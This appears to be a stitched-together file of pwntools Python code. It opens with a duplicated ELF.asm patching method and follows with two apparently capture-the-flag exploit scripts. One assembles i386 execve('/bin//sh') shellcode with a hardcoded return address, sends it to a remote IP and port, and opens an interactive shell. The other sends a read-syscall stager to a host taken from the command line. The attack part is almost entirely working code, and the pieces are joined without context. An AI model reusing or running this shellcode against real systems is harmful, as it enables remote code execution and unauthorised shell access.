    def asm(self, address, assembly):
        """Assemble ``assembly`` and patch the machine code into the ELF
        at ``address``.

        ``address`` is also used as the assembler's ``vma`` so that
        position-dependent encodings are computed for the target location.
        The resulting binary can be saved with ELF.save().
        """
        self.write(address, asm(assembly, vma=address))
    def asm(self, address, assembly):
        """asm(address, assembly)

        Assemble ``assembly`` with its virtual address (``vma``) set to
        ``address`` and write the resulting bytes into the ELF at that
        address.

        This modifies the ELF in-place.
        The resulting binary can be saved with :meth:`.ELF.save`
        """
        code = asm(assembly, vma=address)
        self.write(address, code)
# pop rax # 1 byte
# cdq # 1 byte
# sub esp, 0x16 # 3 bytes <-- 0x16 because 18 bytes + 4 bytes (ret override) = 22 bytes
# jmp esp # 2 bytes

from pwnlib.asm import *
from pwn import *

# Two instruction lists assembled separately so that a 4-byte value can be
# spliced between the two fragments (see `payload` below).
payload_part_1 = [
    'push 0x0b', 'pop eax', 'push ecx', 'push 0x68732f2f', 'push 0x6e69622f',
    'mov ebx, esp', 'int 0x80'
]
payload_part_2 = ['xor ecx, ecx', 'xor edx, edx', 'sub esp, 0x16', 'jmp esp']
# trying with strings
# \x31\xC9\x31\xD2\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\xCD\x08\x6A\x0B\x58\x99\x83\xEC\x16\xFF\xE4
# Each instruction is assembled on its own with arch pinned to i386 rather
# than relying on context.arch; asm() returns bytes under Python 3, hence the
# b''.join.
hexload1 = b''.join([asm(i, arch='i386') for i in payload_part_1])
hexload2 = b''.join([asm(i, arch='i386') for i in payload_part_2])
# p32() packs a 32-bit value using context endianness (little by default).
payload = hexload1 + p32(0x0804919f) + hexload2
print(payload, len(payload))  # raw bytes and total length, for inspection

HOST = '167.71.143.20'
PORT = 31501

# remote() opens a TCP tube. recvuntil() is passed a str while the tube works
# in bytes -- pwntools encodes it (newer versions may warn); verify against the
# installed version.
p = remote(HOST, PORT)
p.recvuntil("> ")
p.sendline(payload)  # appends context.newline (b'\n' by default) after payload
# interactive() blocks until the connection closes, so the file below is only
# written after the session ends.
p.interactive()

# Persist the exact bytes that were sent, for reproducibility and later analysis.
with open('payload.hex', 'wb') as f:
    f.write(payload)
from pwn import *
from pwnlib.asm import *

# Python 2 script: the print statements, raw_input() and str.encode('hex')
# below will not run unchanged under Python 3.
# `sys` and `socket` are in scope via `from pwn import *`.
LOCAL = ('localhost', 40002)
LOCAL = (sys.argv[1], 40002)  # overrides the line above: host from argv, port fixed
# LOCAL = ('128.199.133.96',31331)
BUFFER = 4096  # maximum bytes requested per recv()

# Plain socket rather than a pwntools tube. No timeout is set, so connect()
# and recv() can block indefinitely; connection errors are not handled.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(LOCAL)

# asm() is called without an explicit arch, so it assembles for context.arch
# (i386 unless the caller changed it). The 16-bit `mov ax` / `sub cx` forms
# only touch the low halves of eax / ecx.
x = asm("""
    mov ax,0x3
    push eax
    pop ebx
    sub cx,128
    push ecx
    pop edx
    int 0x80
    ret
""")

print len(x), x.encode('hex')  # byte count and hex dump of the assembled code

raw_input("?")  # wait for the user before sending
s.send(x)

# Three reads of up to BUFFER bytes each; recv() may return fewer bytes, or an
# empty string once the peer closes the connection.
print s.recv(BUFFER)
print s.recv(BUFFER)
print s.recv(BUFFER)

s.close()